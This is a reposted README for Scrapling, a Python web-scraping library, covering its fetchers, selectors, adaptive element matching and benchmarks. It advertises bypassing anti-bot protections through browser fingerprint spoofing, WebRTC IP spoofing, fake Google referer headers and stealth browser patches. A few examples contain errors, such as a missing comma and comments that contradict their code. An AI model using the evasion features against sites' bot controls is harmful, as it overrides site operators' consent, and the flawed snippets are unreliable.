FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • πŸ”„ Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • πŸ” Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling powerful features.

High Performance

  • πŸš€ Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • πŸ”‹ Memory Efficient: Optimized data structures for minimal memory footprint.
  • ⚑ Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • πŸ› οΈ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that takes less memory than standard dictionaries with added methods.
  • πŸ“ Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • πŸ”Œ Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • πŸ“˜ Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

# Library Time (ms) vs Scrapling
1 Scrapling 5.44 1.0x
2 Parsel/Scrapy 5.53 1.017x
3 Raw Lxml 6.76 1.243x
4 PyQuery 21.96 4.037x
5 Selectolax 67.12 12.338x
6 BS4 with Lxml 1307.03 240.263x
7 MechanicalSoup 1322.64 243.132x
8 BS4 with html5lib 3373.75 620.175x

As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.

Extraction By Text Speed Test

Library Time (ms) vs Scrapling
Scrapling 2.51 1.0x
AutoScraper 11.41 4.546x

Scrapling can find elements with more methods and it returns full element Adaptor objects not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; Starting from version 0.2.9, we require at least Python 3.9 to work.

pip3 install scrapling

Then run this command to install browsers' dependencies needed to use Fetcher classes

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single request fashion and then return an Adaptor object. This feature was introduced because the only option we had before was to fetch the page as you wanted it, then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.

[!NOTE] The auto_match argument is enabled by default which is the one you should care about the most as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers which makes Fetcher create and use real browser's headers then create a referer header as if this request came from Google's search of this URL's domain. It's enabled by default. You can also set the number of retries with the argument retries for all methods and this will make httpx retry requests if it failed for any reason. The default number of retries for all Fetcher methods is 3.

Hence: All headers generated by stealthy_headers argument can be overwritten by you through the headers argument

You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For Async requests, you will just replace the import like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

For the sake of simplicity, expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | βœ”οΈ | | block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | βœ”οΈ | | extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | βœ”οΈ | | block_webrtc | Blocks WebRTC entirely. | βœ”οΈ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ | | addons | List of Firefox addons to use. **Must be paths to extracted addons.** | βœ”οΈ | | humanize | Humanize the cursor movement. Takes either True or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | βœ”οΈ | | allow_webgl | Enabled by default. Disabling it WebGL not recommended as many WAFs now checks if WebGL is enabled. | βœ”οΈ | | geoip | Recommended to use with proxies; Automatically use IP's longitude, latitude, timezone, country, locale, & spoof the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | βœ”οΈ | | disable_ads | Disabled by default, this installs `uBlock Origin` addon on the browser if enabled. | βœ”οΈ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | βœ”οΈ | | wait_selector | Wait for a specific css selector to be in a specific state. | βœ”οΈ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ | | os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is Scrapling matching the fingerprints with the current OS. | βœ”οΈ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

Using this Fetcher class, you can make requests with: 1) Vanilla Playwright without any modifications other than the ones you chose. 2) Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include: * Patching the CDP runtime fingerprint. * Mimics some of the real browsers' properties by injecting several JS files and using custom options. * Using custom flags on launch to hide Playwright even more and make it faster. * Generates real browser's headers of the same type and same user OS then append it to the request's headers. 3) Real browsers by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher and most of the options can be enabled on it. 4) NSTBrowser's docker browserless option by passing the CDP URL and enabling nstbrowser_mode option.

Hence using the real_chrome argument requires that you have Chrome browser installed on your device

Add that to a lot of controlling/hiding options as you will see in the arguments list below.

Expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), or `False` for headful/visible mode. | βœ”οΈ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate a real Useragent of the same browser and use it.** | βœ”οΈ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | βœ”οΈ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ | | wait_selector | Wait for a specific css selector to be in a specific state. | βœ”οΈ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | βœ”οΈ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | βœ”οΈ | | extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if used together. | βœ”οΈ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ | | hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | βœ”οΈ | | disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | βœ”οΈ | | stealth | Enables stealth mode, always check the documentation to see what stealth mode does currently. | βœ”οΈ | | real_chrome | If you have Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | βœ”οΈ | | locale | Set the locale for the browser if wanted. The default value is `en-US`. | βœ”οΈ | | cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | βœ”οΈ | | nstbrowser_mode | Enables NSTBrowser mode, **it have to be used with `cdp_url` argument or it will get completely ignored.** | βœ”οΈ | | nstbrowser_config | The config you want to send with requests to the NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser's docker browserless config._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
# do something with it...

You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor object as an argument and return True if the condition satisfies or False otherwise like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1' auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.

To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh?Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)

If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain, this is because for Scrapling these are two different URLs, not the website so it isolates their data. To tell Scrapling they are the same website, we then pass the domain we want to use for saving auto-match data for them both so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes: 1. For the two examples above I used one time the Adaptor class and the second time the Fetcher class just to show you that you can create the Adaptor object by yourself if you have the source or fetch the source using any Fetcher class then it will create the Adaptor object for you. 2. Passing the auto_save argument with the auto_match argument set to False while initializing the Adaptor/Fetcher object will only result in ignoring the auto_save argument value and the following warning message text Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. Same case with the auto_match argument.

  1. The auto_match parameter works only for Adaptor instances not Adaptors so if you do something like this you will get an error python page.css('body').css('#p1', auto_match=True) because you can't auto-match a whole list, you have to be specific and do something like python page.css_first('body').css('#p1', auto_match=True)

Find elements by filters

Inspired by BeautifulSoup's find_all function you can find elements by using find_all/find methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.

  • To be more specific:
  • Any string passed is considered a tag name
  • Any iterable passed like List/Tuple/Set is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element(s) attribute names and attribute values.
  • Any regex patterns passed are used as filters to elements by their text content
  • Any functions passed are used as filters
  • Any keyword argument passed is considered as an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements that its text content match all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods but you have to set the identifier by yourself.

  • To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')

  • Now later when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
  • if you want to keep it as lxml.etree object, leave the adaptor_type argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it ) Hence all of these methods are methods from the TextHandler within that contains the text content so the same can be done directly if you call the .text property or equivalent selector function.

  • Doing operations on the text content itself includes

  • Cleaning the text from any white spaces and replacing consecutive spaces with single space python quote.clean()
  • You already know about the regex matching and the fast json parsing but did you know that all strings returned from the regex search are actually TextHandler objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
  • Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.

  • Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler that's read-only so it's faster and string values returned are actually TextHandler objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can search by values too and can do partial searches. It might be handy in some cases (returns a generator of matches) python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
  • Serialize the current attributes to JSON bytes: python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
  • Converting it to a normal dictionary python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to make this as short as possible so to take a deep dive, head to the docs section. I will try to keep it updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚑ Enlightening Questions and FAQs

This section addresses common questions about Scrapling, please read this section before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with methods css or xpath with the auto_save parameter set to True before structural changes happen.
  2. Before returning results for you, Scrapling uses its configured database and saves unique properties about that element.
  3. Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.

    Together both are used to retrieve the element's unique properties from the database later. 4. Now later when you enable the auto_match parameter for both the Adaptor instance and the method call. The element properties are retrieved and Scrapling loops over all elements in the page and compares each one's unique properties to the unique properties we already have for this element and a score is calculated for each one. 5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now. 6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

